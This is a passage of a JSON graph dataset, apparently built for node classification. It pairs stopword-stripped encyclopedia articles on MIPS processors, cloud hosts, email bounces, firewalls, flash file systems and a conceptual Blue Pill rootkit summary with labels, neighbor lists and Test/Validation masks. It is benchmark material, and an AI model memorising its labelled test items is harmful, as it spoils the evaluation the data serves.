    "text": "R5000:r5000 r5000 microprocessor implements mips iv instruction set architecture isa developed quantum effect design qed project funded mips technologies inc mti also licensor mti licensed design integrated device technology idt nec nkk toshiba r5000 succeeded qed r4600 r4700 flagship high-end embedded microprocessor idt marketed version r5000 79rv5000 nec vr5000 nkk nr5000 toshiba tx5000 r5000 sold pmc-sierra company acquired qed derivatives r5000 still production today embedded systems users r5000 workstation server computers silicon graphics inc. sgi siemens-nixdorf sgi used r5000 o2 indy low-end workstations r5000 also used embedded systems network routers high-end printers r5000 found way arcade gaming industry r5000 powered mainboards used atari midway initially cobalt qube cobalt raq used derivative model rm5230 rm5231 qube 2700 used rm5230 microprocessor whereas qube 2 used rm5231 original raq systems equipped rm5230 rm5231 cpus later models used amd k6-2 chips eventually intel pentium iii cpus final models original roadmap called 200 mhz operation early 1996 250 mhz late 1996 succeeded 1997 r5000a r5000 introduced january 1996 failed achieve 200 mhz topping 180 mhz positioned low-end workstation microprocessor competition included ibm motorola powerpc 604 hp pa-7300lc intel pentium pro r5000 two-way superscalar design executes instructions in-order r5000 could simultaneously issue integer floating-point instruction one simple pipeline integer instructions another floating-point save transistors die area reduce cost r5000 perform dynamic branch prediction cost reasons instead uses static approach utilizing hints encoded compiler branch-likely instructions first introduced mips ii architecture determine likely branch taken r5000 large l1 caches distinct characteristic qed whose designers favored simple designs large caches r5000 two l1 caches one instructions data capacity 32 kb caches two-way set-associative 32-byte line size virtually indexed physically tagged instructions predecoded enter instruction cache appending four bits instruction four bits specify whether issued together execution unit executed assisted superscalar instruction issue moving dependency conflict checking critical path integer unit executes instructions one cycle latency throughput except multiply divide 32-bit multiplies five-cycle latency four-cycle throughput 64-bit multiplies extra four cycles latency half throughput divides 36-cycle latency throughput 32-bit integers 64-bit integers increased 68 cycles floating-point unit fpu fast single-precision 32-bit design reduced cost benefit sgi whose mid-range 3d graphics workstations relied mostly single-precision math 3d graphics applications fully pipelined made significantly better r4700 r5000 implements multiply-add instruction mips iv isa single-precision adds multiplies multiply-adds four-cycle latency one cycle throughput single-precision divides 21-cycle latency 19-cycle throughput square roots 26-cycle latency 38-cycle throughput division square-root pipelined instructions operate double precision numbers significantly higher latency lower throughput except add identical latency throughput single-precision add multiply multiply-add five-cycle latency two-cycle throughput divide 36-cycle latency 34-cycle throughput square root 68-cycle latency 66-cycle throughput r5000 integrated l2 cache controller supported capacities 512 kb 1 mb 2 mb l2 cache shares sysad bus external interface cache built custom synchronous srams ssrams microprocessor uses sysad bus also used several mips microprocessors bus multiplexed address data share set wires operate clock frequencies 100 mhz initial r5000 support multiprocessing package reserved eight pins future addition feature qed fabless company fabricate designs r5000 fabricated idt nec nkk three companies fabricated r5000 0.35 µm complementary metal–oxide–semiconductor cmos process different process features idt fabricated r5000 process two levels polysilicon three levels aluminium interconnect two levels polysilicon enabled idt use four-transistor sram cell resulting transistor count 3.6 million die measured 8.7 mm 9.7 mm 84.39 mm nec nkk fabricated r5000 process one level polysilicon three levels aluminium interconnect without extra level polysilicon companies use six-transistor sram cell resulting transistor count 5.0 million larger die area around 87 mm die sizes range 80 90 mm claimed mti 0.8 million transistors versions logic remainder contained caches packaged 272-ball plastic ball grid array bga 272-pin plastic pin grid array pga pin-compatible previous mips microprocessor late 1990s quantum effect design acquired license manufacture sell mips microprocessors mti became microprocessor vendor changing name quantum effect devices reflect new business model company first products members rm52xx family initially consisted two models rm5230 rm5260 announced 24 march 1997 rm5230 initially available 100 133 mhz rm5260 133 150 mhz 29 september 1997 new 150 175 mhz rm5230s introduced 175 200 mhz rm5260s rm5230 rm5260 derivatives r5000 differ size primary caches 16 kb instead 32 kb width system interfaces rm5230 32-bit 67 mhz sysad bus rm5260 64-bit 75 mhz sysad bus addition multiply-add three-operand multiply instructions digital signal processing applications microprocessors fabricated taiwan semiconductor manufacturing company tsmc 0.35 μm process three levels interconnect packaged amkor technology power-quad 4 packages rm5230 128-pin version rm5260 208-pin version rm52xx family later joined rm5270 announced embedded systems conference 29 september 1997 intended high-end embedded applications rm5270 available 150 200 mhz improvements addition on-chip secondary cache controller supported 2 mb cache sysad bus 64 bits wide operate 100 mhz packaged 304-pin super-bga sbga pin-compatible rm7000 offered migration path rm7000 20 july 1998 rm52x1 family announced family consisted rm5231 rm5261 rm5271 microprocessors derivatives corresponding devices rm52x0 family fabricated 0.25 μm process four levels metal rm5231 initially available 150 200 250 mhz whereas rm5261 rm5271 available 250 266 mhz 6 july 1999 300 mhz rm5271 introduced priced us 140 quantities 10,000 rm52x1 improved upon previous family larger 32 kb primary caches faster sysad bus supported clock rates 125 mhz qed acquired pmc-sierra rm52xx rm52x1 families continued pmc-sierra products pmc-sierra introduced two rm52x1 derivatives rm5231a rm5261a 4 april 2001 microprocessors fabricated tsmc 0.18 μm process differ previous devices featuring higher clock rates lower power consumption rm5231a available clock rates 250 350 mhz rm5261a 250 400 mhz r5900 used sony playstation 2 modified version r5000 cpu dubbed emotion engine customized instruction/data cache arrangement sony proprietary 107 vector simd multimedia extensions mmi custom fpu n't ieee 754 compliant unlike fpus used r5000 also second mips core acted sync controller specialized vector coprocessors important 3d math time principally computed cpu",
    "neighbors": [
      4098,
      8327,
      8711,
      6926,
      783,
      7445,
      2071,
      9851,
      4124,
      6815,
      1952,
      8481,
      8355,
      5028,
      8231,
      6057,
      938,
      426,
      8237,
      2994,
      1461,
      7234,
      10051,
      1480,
      10316,
      6247,
      6250,
      6252,
      5358,
      10734,
      6256,
      5237,
      760,
      3451
    ],
    "mask": "None"
  },
  {
    "node_id": 6254,
    "label": 4,
    "text": "Blue_Pill_(software):blue pill software blue pill codename rootkit based x86 virtualization blue pill originally required amd-v pacifica virtualization support later ported support intel vt-x vanderpool well designed joanna rutkowska originally demonstrated black hat briefings august 3 2006 reference implementation microsoft windows vista kernel name reference red pill blue pill concept 1999 film matrix blue pill concept trap running instance operating system starting thin hypervisor virtualizing rest machine previous operating system would still maintain existing references devices files nearly anything including hardware interrupts requests data even system time could intercepted fake response sent hypervisor original concept blue pill published another researcher ieee oakland may 2006 name vmbr virtual-machine based rootkit joanna rutkowska claims since detection program could fooled hypervisor system could 100 undetectable since amd virtualization seamless design virtualized guest supposed able query whether guest therefore way blue pill could detected virtualization implementation functioning specified assessment repeated numerous press articles disputed amd issued statement dismissing claim full undetectability security researchers journalists also dismissed concept implausible virtualization could detected timing attack relying external sources time 2007 group researchers led thomas ptacek matasano security challenged rutkowska put blue pill rootkit detector software year black hat conference deal deemed no-go following rutkowska request 384,000 funding prerequisite entering competition rutkowska alexander tereshkin countered detractors claims subsequent black hat speech arguing proposed detection methods inaccurate source code blue pill since made public following license unauthorized use including publishing distribution software requires valid license copyright holder software provided educational use black hat training conference red pill technique detect presence virtual machine also developed joanna rutkowska",
    "neighbors": [
      2275,
      8273,
      8978,
      1143,
      4695,
      4956,
      9791
    ],
    "mask": "Test"
  },
  {
    "node_id": 6255,
    "label": 7,
    "text": "VEXXHOST:vexxhost vexxhost privately-owned leading canadian openstack cloud infrastructure-as-a-service provider corporate headquarter montreal quebec founded 2006 vexxhost offers cloud computing solutions public cloud private cloud hybrid cloud solutions along kubernetes enablement openstack consulting services company data centres located montreal quebec santa clara california established 2006 vexxhost initially web hosting provider offering services shared hosting vps however advancement cloud technologies vexxhost made decision move innovative options cloud hosting leap cloud-based hosting garnered positive response encouraging vexxhost invest cloud-based solutions 2011 vexxhost adopted openstack software infrastructure since vexxhost active contributor avid user openstack transition resulted vexxhost adopting openstack software infrastructure beginnings vexxhost ’ profound relationship openstack foundation today vexxhost global provider infrastructure-as-a-service openstack public cloud private cloud hybrid cloud consulting solutions customers ranging small businesses enterprises across world vexxhost currently running stein latest release openstack able implement update clouds day release vexxhost contributing openstack community since second release bexar 2011 company also corporate sponsor infrastructure donor openstack infrastructure teamwhile maintaining presence community regularly attending openstack summits vexxhost also part interop challenge boston summit 2017 vexxhost sponsored openstack summits held berlin 2018 vancouver denver 2019 co-founder mohammed naser acting ptl openstack ’ ansible project sits chair openstack technical committee given talks montreal ottawa toronto openstack meet-ups summits well several keynotes across north america europe vexxhost plays part community actively contributing upstream code sharing feedback ptls developers along operation experience running canada ’ biggest openstack public cloud vexxhost recently awarded openstack superuser award open infrastructure summit held april 29th 2019 denver vexxhost offers fully certified openstack powered cloud solutions validated testing provide api compatibility openstack core services additionally accelerate bugfixes reporting diagnosing working community addition participation openstack ’ ironic bare metal program december 10th 2018 vexxhost announced become silver member linux foundation subsidiary cloud native computing foundation vexxhost unveiled certified kubernetes-as-a-service offering runs openstack ’ magnum month vexxhost also sponsored kubecon north america 2018 seattle located montreal canada private data centre uses green hydroelectric power ssae-16 soc type 2 compliant high level physical security every aspect infrastructure secured advanced firewalls protect users ’ data cloud platforms designed implement full isolation reduce security issues maximize reliability newly announced santa clara california data centre bring standards data security storage united states including secure ssae-16 facility undergone soc type 2 audit silicon valley region also equipped nested virtualization 40gbit internal networking high throughput low latency optimal processing big data 10gbit public internet connection region currently running latest release openstack stein vexxhost runs exclusively openstack managed services across entire infrastructure work users help architect configure optimize cloud infrastructure order reduce expenses increase productivity vexxhost also delivers high level expertise clients enabling focus core competencies vexxhost manages largest openstack public cloud canada montreal data centres addition vexxhost ’ santa clara data centre public cloud offering available globally vexxhost recently revamped billing model public cloud offers minutely billing clients following openstack projects supported readily available within vexxhost public cloud offering above-mentioned projects vexxhost offers on-demand seamless integration openstack projects vexxhost ’ private cloud offering available hosted deployment on-premise deployment anywhere world regardless data centre ownership openstack projects supported vexxhost openstack certification private cloud solution offers services available public cloud vexxhost ’ updated private cloud offering available different deployment models on-premise heavy lifting gathering requirements architecting cloud deploying testing managing openstack done vexxhost team users provide data centre hardware hosted leverage vexxhost ’ multiple ssae-16 data centres certified tested hardware bring private cloud quickly users access use cloud via encrypted vpns public internet private fibre access also option deploy private cloud anywhere world regardless data centre ownership moreover comes unique feature access virtual machines bare metal kubernetes one environment another noteworthy feature provide users access multiple architecture options intel arm well access enterprise-grade gpus customizable hardware specifications following openstack projects supported readily available within vexxhost private cloud offering above-mentioned projects vexxhost offers on-demand seamless integration openstack projects vexxhost flexible hybrid solutions offer mix public cloud private cloud on-premise solutions traditionally mixed matched meet needs user users get access dedicated single-tenant resources vexxhost ’ public cloud carve private cloud cost savings option getting access dedicated hardware vexxhost ’ dedicated load balancer distributes traffic among dedicated public private servers every load balancer platform runs within dedicated instance dedicated ip vexxhost offers consultation various cloud computing openstack troubleshooting development cloud strategy roadmap upgrades new releases launching public openstack services openstack project implementations openstack consultants help companies upgrade latest openstack release implement openstack project give guidance openstack strategy vexxhost kubernetes enablement offering developed make certified kubernetes service accessible fully managed service provides quick on-demand access certified kubernetes compatible virtual machines bare metal provides users secure container clusters enhanced isolation upgraded performance due faster deployment times simplified extensive service integrations vexxhost team currently running openstack stein openstack ’ latest 19th release since day one release result vexxhost team first production-ready private cloud running stein vexxhost offered service users past consultation offering however make easier users take advantage company broken openstack upgrades simplified solution",
    "neighbors": [
      4194,
      4011
    ],
    "mask": "None"
  },
  {
    "node_id": 6256,
    "label": 3,
    "text": "R8000:r8000 r8000 microprocessor chipset developed mips technologies inc. mti toshiba weitek first implementation mips iv instruction set architecture r8000 also known tfp tremendous floating-point name development development r8000 started early 1990s silicon graphics inc. sgi r8000 specifically designed provide performance circa 1990s supercomputers microprocessor instead central processing unit cpu built many discrete components gate arrays time performance traditional supercomputers advancing rapidly reduced instruction set computer risc microprocessors predicted risc microprocessors would eventually match performance expensive larger supercomputers fraction cost size making computers level performance accessible enabling deskside workstations servers replace supercomputers many situations first details r8000 emerged april 1992 announcement mips computer systems detailing future mips microprocessors march 1992 sgi announced acquiring mips computer systems became subsidiary sgi called mips technologies inc. mti mid-1992 development r8000 transferred mti continued r8000 expected introduced 1993 delayed mid-1994 first r8000 75 mhz part introduced 7 june 1994 priced us 2,500 time mid-1995 90 mhz part appeared systems sgi r8000 high cost narrow market technical scientific computing restricted market share although popular intended market largely replaced cheaper generally better performing r10000 introduced january 1996 users r8000 sgi used power indigo2 workstation power challenge server power challengearray cluster power onyx visualization system november 1994 top500 list 50 systems 500 used r8000 highest ranked r8000-based systems four power challenges positions 154 157 18 r8000s chip set consisted r8000 microprocessor r8010 floating-point unit two tag rams streaming cache r8000 superscalar capable issuing four instructions per cycle executes instructions program order five-stage integer pipeline r8000 controlled chip set executed integer instructions contained integer execution units integer register file primary caches hardware instruction fetch branch prediction translation lookaside buffers tlbs stage one four instructions fetched instruction cache instruction cache 16 kb large direct-mapped virtually tagged virtually indexed 32-byte line size instruction decoding register reads occur stage two branch instructions resolved well leading one-cycle branch mispredict penalty load store instructions begin execution stage three integer instructions stage four integer execution delayed stage four integer instructions use result load operand may issued cycle load results written integer register file stage five integer register file nine read ports four write ports four read ports supply operands two integer execution units branch unit considered part integer unit another four read ports supply operands two address generators four ports needed rather two base register index register address style added mips iv isa r8000 issues one integer store per cycle one final read port delivers integer store data two register file write ports used write results two integer functional units r8000 issues two integer loads per cycle two write ports used write results integer loads register file level 1 data cache organized two redundant arrays one read port one write port integer stores written arrays two loads could processed parallel one array integer functional units consisted two integer units shift unit multiply-divide unit two address generator units multiply divide instructions executed multiply-divide unit pipelined result latency multiply instruction four cycles 32-bit operands six cycles 64-bit latency divide instruction depends number significant digits result thus varies 21 73 cycles loads stores begin execution stage three r8000 two address generation units agus calculate virtual address loads stores stage four virtual addresses translated physical addresses dual-ported tlb contains 384 entries three-way set associative 16 kb data cache accessed cycle dual-ported accessed via two 64-bit buses service two loads one load one store per cycle cache protected parity error correcting code ecc event cache miss data must loaded streaming cache eight-cycle penalty cache virtually indexed physically tagged direct mapped 32-byte line size uses write-through allocate protocol loads hit data cache result written integer register file stage five r8010 executed floating-point instructions provided instruction queue r8000 queue decoupled floating-point pipeline integer pipeline implementing limited form out-of-order execution allowing floating-point instructions execute possible integer instructions group issued pipelines decoupled help mitigate streaming cache latency contained floating-point register file load queue store queue two identical floating-point units instructions except divide square-root pipelined r8010 implements iterative division square-root algorithm uses multiplier key part requiring pipeline stalled unit duration operation arithmetic instructions except compares four-cycle latency single double precision divides latencies 14 20 cycles respectively single double precision square-roots latencies 14 23 cycles respectively streaming cache external 1 16 mb cache serves r8000 l2 unified cache r8010 l1 data cache operates clock rate r8000 built commodity synchronous static rams scheme used attain sustained floating point performance requires frequent access data small low-latency primary cache would contain enough data frequently miss necessitating long latency refiles reduce performance streaming cache two-way interleaved two independent banks containing data even odd addresses therefore perform two reads two writes read write every cycle provided two accesses separate banks bank accessed via two 64-bit unidirectional buses one reads writes scheme used avoid bus turnover required bidirectional buses avoiding bus turnover cache read one cycle written next cycle without intervening cycle turnover resulting improved performance streaming cache tags contained two tag ram chips one bank chips contain identical data chip contains 1.189 mbit cache tags implemented four-transistor sram cells chips implemented 0.7 μm bicmos process two levels polysilicon two levels aluminium interconnect bicmos circuitry used decoders combined sense amplifier comparator portions chip reduce cycle time tag ram 14.8 mm 14.8 mm large packaged 155-pin cpga dissipates 3 w 75 mhz addition providing cache tags tag rams responsible streaming cache four-way set associative avoid high pin count cache tags four-way set associative logic selects set access lookup instead usual way implementing set-associative caches access streaming cache pipelined mitigate latency pipeline five stages stage one addresses sent tag rams accessed stage two stage three signals tag rams propagate ssrams stage four ssrams accessed data returned r8000 r8010 stage five r8000 contained 2.6 million transistors measured 17.34 mm 17.30 mm 299.98 mm² r8010 contained 830,000 transistors total two chips contained 3.43 million transistors fabricated toshiba vhmosiii process 0.7 µm triple-layer metal complementary metal–oxide–semiconductor cmos process packaged 591-pin ceramic pin grid array cpga packages chips used 3.3 v power supply r8000 dissipated 13 w 75 mhz",
    "neighbors": [
      4098,
      8327,
      8711,
      6926,
      783,
      7445,
      9851,
      4124,
      6815,
      8481,
      5028,
      8231,
      6057,
      938,
      426,
      8237,
      9391,
      7093,
      1463,
      7234,
      10051,
      4804,
      1480,
      10316,
      2525,
      3175,
      6247,
      6250,
      6252,
      6253,
      5358,
      10734,
      5237,
      6006,
      760,
      3451
    ],
    "mask": "Test"
  },
  {
    "node_id": 6257,
    "label": 2,
    "text": "KPackage:kpackage kpackage kde package manager frontend supported bsd debian gentoo rpm slackware packages provided gui management upgrade existing packages installation acquirement new packages additionally provided functionality help manage package caches kpackage part kdeadmin developed kde.org",
    "neighbors": [
      11525,
      2310,
      10760,
      2955,
      7947,
      7181,
      2448,
      5397,
      6680,
      8476,
      5670,
      4775,
      6694,
      8621,
      6446,
      7983,
      1842,
      6583,
      2872,
      3131,
      10172,
      3649,
      10817,
      5067,
      3407,
      6991,
      6227,
      4309,
      4951,
      7384,
      7140,
      5096,
      9324,
      7920,
      10096,
      1138,
      1522,
      3828,
      6389
    ],
    "mask": "None"
  },
  {
    "node_id": 6258,
    "label": 3,
    "text": "Macintosh_IIcx:macintosh iicx macintosh iicx personal computer designed manufactured sold apple computer inc. march 1989 march 1991 introduced half year macintosh iix iicx resembles iix great extent provides performance seven inches narrower ten pounds lighter somewhat quieter due smaller internal fan relative compactness results three nubus slots available compared six iix new case apple first designed operate either horizontal vertical orientation remained use successors macintosh iici quadra 700 idea vertical orientation one first minitower cases suggested apple ceo john sculley running space desk despite fact new layout actually took space monitor taken account model designated iicx compact echoing earlier apple iic compact model apple ii series x apple designation 68030 processor users liked mac iicx part components parts ram nubus slots power supply snapped place inside case without need screws one central safety screw tied assembly together though often reinstalled ever removed iicx introduction jean-louis gassée demonstrated iicx modular design assembling one parts front audience made less expensive build easier repair earned heavy praise warm reception amongst mac community machine also lightest apple lineup time however unlike ii iix cpu soldered logic board therefore upgraded case also unable accommodate 5 1/4 full-height hard disk drives model superseded macintosh iici used case",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      11118,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 6259,
    "label": 7,
    "text": "Moovly:moovly moovly company provides cloud-based platform saas enables users create generate multimedia content animated videos video presentations animated info graphics video content includes mix animation motion graphics moovly founded belgium november 2012 brendon grunewald geert coppens vision becoming number one platform engaging customisable multimedia content creation company mission enable everyone create engaging multimedia content making affordable intuitive simple company seen steady subscriber growth multinational corporations small medium business well educational institutions.. company initially secured several rounds external investment fund growth july 2016 listed toronto venture stock exchange moovly media inc symbol mvy tsx.v mvy october 9 2018 moovly announced launch new dropbox integration allows moovly users easily access upload photo video content dropbox within moovly studio editor moovly cloud based digital media content creation software platform content created via various interfaces including editor well simple custom-made video generation interfaces using combination uploaded images videos sounds well pre-defined library objects users able quickly assemble new animated content final videos presentations downloaded mp4 example published variety video platforms moovly provides feature-rich free license allowing users create animated videos exported facebook youtube well premium licenses advanced professional use free videos include moovly branding educational tool educational purposes moovly offers specific licenses companies brands use library animated graphics fonts standard color set february 4 2019 certificate site expired one able come site",
    "neighbors": [
      467,
      4623
    ],
    "mask": "None"
  },
  {
    "node_id": 6260,
    "label": 9,
    "text": "Collaborative_human_interpreter:collaborative human interpreter collaborative human interpreter chi proposed software interface human-based computation first proposed programming language blog google blogoscoped implementable via api virtually programming language specially designed collecting making use human intelligence computer program one typical usage implementing impossible-to-automate functions example currently difficult computer differentiate images men women non-humans however easy people programmer using chi could write code fragment along lines code function codice_1 currently approximate result task easily solved person function codice_2 called system send request someone person received request process task input result person task processor inputs value codice_3 'll get value variable result program querying process highly automated november 6 2005 amazon.com launched chi business platform amazon mechanical turk first business application using chi chi originally mentioned philipp lenssen blog",
    "neighbors": [
      1001
    ],
    "mask": "None"
  },
  {
    "node_id": 6261,
    "label": 4,
    "text": "Bounce_message:bounce message bounce message bounce automated message mail system informing sender previous message message delivered delivery problem occurred original message said bounced formal terms bounce message include non-delivery report non-delivery receipt ndr failed delivery status notification dsn message non-delivery notification ndn errors may occur multiple places mail delivery sender may sometimes receive bounce message mail server reporting unable send message alternatively recipient mail server reporting although accepted message unable deliver specified user server accepts message delivery also accepting responsibility deliver bounce message event delivery fails e-mail arrives destination server address mymail.example sending alice mymail.example may mail daemon unable deposit message specified user mailbox underlying hard drive server insufficient space sending e-mail service e-mail sent may unable reach destination address case sender would receive bounce message mail server common causes mail servers unable reach destination users may receive erroneous bounce messages messages never actually sent happen particular context email spam email viruses spammer sender may forge message another user intended recipient spam forges message appear yet another user third party message delivered intended recipient bounce message would returned third party instead spammer called backscatter library.example mail server known message would undeliverable instance jill user account would accepted message first place therefore would sent bounce instead would rejected message smtp error code would leave jack mail server store.example obligation create deliver bounce bounces special form autoresponder autoresponses automatic replies mails sent program—as opposed human user—in reply received mail sent bounce address examples auto replies vacation mails challenges challenge-response spam filtering replies list servers feedback reports auto replies discussed rfc 3834 auto replies sent codice_1 stated received mail triggered auto reply response typically sent empty return-path otherwise auto responders could trapped sending auto replies back forth codice_1 visible delivered mail header field codice_1 inserted smtp mail delivery agent mda usually combined mail transfer agent mta mda simply copies reverse path smtp codice_4 command codice_1 mda also removes bogus codice_1 header fields inserted mtas header field generally guaranteed reflect last reverse path seen codice_4 command today paths normally reduced ordinary email addresses old smtp 'source routing deprecated 1989 historical background info see sender rewriting scheme one special form path still exists empty path codice_8 used many auto replies especially bounces strict sense bounces sent non-empty codice_1 incorrect rfc 3834 offers heuristics identify incorrect bounces based local part left hand side address non-empty codice_1 even defines mail header field codice_11 identify auto replies mail header part mail data smtp command codice_12 mtas typically n't look mail deal envelope includes codice_4 address a.k.a codice_1 codice_15 reverse path e.g. rfc 2822-codice_16 mail header field codice_16 details important schemes like batv remaining bounces empty codice_1 non-delivery reports ndrs delivery status notifications dsns dsns explicitly solicited smtp service extension esmtp however widely used explicit requests delivery failure details much commonly implemented variable envelope return path verp explicit requests rarely implemented ndrs basic smtp function soon mta accepted mail forwarding delivery silently delete drop create send bounce message originator forwarding delivery failed excluding mdas mtas forward mails another mta next mta free reject mail smtp error message like user unknown quota etc point sending mta bounce message i.e inform originator bounce may arise also without rejecting mta rfc 5321 puts smtp server accepted task relaying mail later finds destination incorrect mail delivered reason must construct undeliverable mail notification message send originator undeliverable mail indicated reverse-path rule essential smtp name says 'simple protocol reliably work mail silently vanishes black holes bounces required spot fix problems today however common receive mostly spam emails usually uses forged codice_1s often impossible mta inform originator sending bounce forged codice_1 would hit innocent third party addition specific reasons preferable silently drop message rather reject let alone bounce quoting rfc 5321 section 6.2 discussed section 7.8 section 7.9 dropping mail without notification sender permitted practice however extremely dangerous violates long tradition community expectations mail either delivered returned silent message-dropping misused could easily undermine confidence reliability internet mail systems silent dropping messages considered cases high confidence messages seriously fraudulent otherwise inappropriate validating sender inherent flaw today smtp without deprecated source routes mentioned earlier addressed various proposals directly batv spf many reasons email may bounce one reason recipient address misspelled simply exist receiving system user unknown condition reasons include resource exhaustion — full disk — rejection message due spam filters addition muas allow users bounce message demand user-initiated bounces bogus bounces definition real bounce automated emitted mta mda bounce messages smtp sent envelope sender address codice_21 known null sender address frequently sent codice_22 header address codice_23 recipient site typically bounce message contain several pieces information help original sender understanding reason message delivered rfc 3463 describes codes used indicate bounce reason common codes 5.1.1 unknown user 5.2.2 mailbox full 5.7.1 rejected security policy/mail filter format reporting administrative messages defined rfc 6522 dsn may mime multipart/report message composed three parts second part dsn also quite readable essential understand mta played role reporting-mta responsible composing sending dsn remote-mta rejects message smtp transaction field diagnostic-code type smtp may used report value note beside numerical 3-digit value smtp response contains human readable part information",
    "neighbors": [
      5472,
      4163,
      6762,
      9451,
      7949,
      8093,
      4272,
      8337,
      914,
      9588,
      9909,
      2041,
      7739,
      6492,
      3549
    ],
    "mask": "None"
  },
  {
    "node_id": 6262,
    "label": 4,
    "text": "Screened_subnet:screened subnet network security screened subnet refers use one logical screening routers firewall define three separate subnets external router sometimes called access router separates external network perimeter network internal router sometimes called choke router separates perimeter network internal network perimeter network also called border network demilitarized zone dmz intended hosting servers sometimes called bastion hosts accessible access internal external networks purpose screened subnet dmz establish network heightened security situated external presumed hostile network internet extranet internal network screened subnet essential concept e-commerce entity presence world wide web using electronic payment systems network services prevalence hackers advanced persistent threats computer worms botnets threats networked information systems separating firewall system two separate component routers achieves greater potential throughput reducing computational load router component router screened subnet firewall needs implement one general task router less complex configuration screened subnet dmz also achieved single firewall device three network interfaces term demilitarized zone military context refers area treaties agreements contending groups forbid military installations activities often along established frontier boundary two military powers alliances similarity network security screened network dmz reduced fortifications intended points ingress external network presumed hostile appears term demilitarized zone dmz popularized sales marketing term sometime development screened routers firewalls often used synonym may different meaning whereas screened subnet firewall employs two screened routers create three subnets screened host firewall employs one screened router define two subnets external network internal network screened subnet firewall secure intruder must traverse two filtered routes reach internal network bastion dmz host compromised intruder must still bypass second filtered route reach internal network hosts",
    "neighbors": [
      8998,
      7175,
      5608,
      6024,
      939,
      11502,
      4883,
      9715,
      3381,
      119,
      2041,
      4830,
      4895
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6263,
    "label": 6,
    "text": "YAFFS:yaffs yaffs yet another flash file system designed written charles manning whitecliffs new zealand company aleph one yaffs1 first version file system designed then-current nand chips 512 byte page size 16 byte spare oob out-of-band area work started 2002 first released later year initial work sponsored toby churchill ltd brightstar engineering older chips also generally allow 2 3 write cycles per page yaffs takes advantage dirty pages marked writing specific spare area byte newer nand flash chips larger pages first 2k pages 64 bytes oob later 4k stricter write requirements page within erase block 128 kilobytes must written sequential order page must written designing storage system enforces write rule write property several advantages yaffs2 designed accommodate newer chips based yaffs1 source code major difference internal structures fixed assume 512 byte sizing block sequence number placed written page way older pages logically overwritten without violating write rule released late 2003 yaffs robust log-structured file system holds data integrity high priority secondary yaffs goal high performance yaffs typically outperform alternatives also designed portable used linux wince psos rtems ecos threadx various special-purpose oses variant 'yaffs/direct used situations os embedded oses bootloaders core filesystem simpler interfacing higher lower level code nand flash hardware yaffs codebase licensed gpl per-product licenses available aleph one special procedure initialize yaffs filesystem beyond simply erasing flash memory bad block encountered yaffs follows smart media scheme marking fifth byte block spare area blocks marked remain unallocated write file data yaffs initially writes whole page chunk yaffs terminology describes file metadata timestamps name path etc new file assigned unique object id number every data chunk within file contain unique object id within spare area yaffs maintains tree structure ram physical location chunks chunk longer valid file deleted parts file overwritten yaffs marks particular byte spare area chunk ‘ dirty ’ entire block 32 pages marked dirty yaffs erase block reclaim space filesystem free space low yaffs consolidates group good pages onto new block yaffs reclaims space used dirty pages within original blocks yaffs system mounts nand flash device must visit block check valid data scanning spare area information reconstitutes memory-resident tree data structure yaffs2 similar concept yaffs1 shares much code yaffs2 code base supports yaffs1 data formats backward compatibility main difference yaffs2 needs jump significant hoops meet write requirement modern nand flash yaffs2 marks every newly written block sequence number monotonically increasing sequence chunks inferred block sequence number chunk offset within block thereby yaffs2 scans flash detects multiple chunks identical objectids chunknumbers choose use taking greatest sequence number efficiency reasons yaffs2 also introduces concept shrink headers example file resized smaller size yaffs1 mark affected chunks dirty yaffs2 due write rule yaffs2 instead writes shrink header indicates certain number pages point invalid lets yaffs2 reconstruct final state filesystem system reboots yaffs2 uses abstract definition nand flash allowing used wider variety flash parts different geometries bad block handling rules etc yaffs2 later added support checkpointing bypasses normal mount scanning allowing fast mount times performance vary mount times 3 seconds 2 gb reported",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      4634,
      3611,
      5661,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      8285,
      10851,
      4708,
      9836,
      7789,
      9333,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      7319,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      8447,
      3328,
      3841,
      5892,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      11568,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      2494,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 6264,
    "label": 2,
